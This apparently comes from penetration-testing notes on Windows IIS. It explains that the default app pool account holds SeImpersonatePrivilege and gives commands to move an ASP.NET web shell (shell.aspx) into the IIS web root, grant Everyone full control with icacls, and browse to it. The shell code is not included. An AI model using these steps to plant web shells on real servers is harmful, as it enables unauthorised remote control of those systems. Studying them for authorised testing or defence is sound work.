Existing Services
Web Shells
IIS runs with
iss apppool\defaultapppool, this is an unprivileged user, but it hasSeImpersonatePrivilege.ASP.NET shell can be placed in the web root directory,
C:\inetpub\wwwroot.
move shell.aspx C:\inetpub\wwwroot\It might be that the
iis apppool\defaultapppooldoesn't have the permission to read the file.Permission of the file can be changed using
icacls
icacls.exe shell.aspx /grant Everyone:FThe web shell can be located at http://server.com/shell.aspx.
MSSQL
Last updated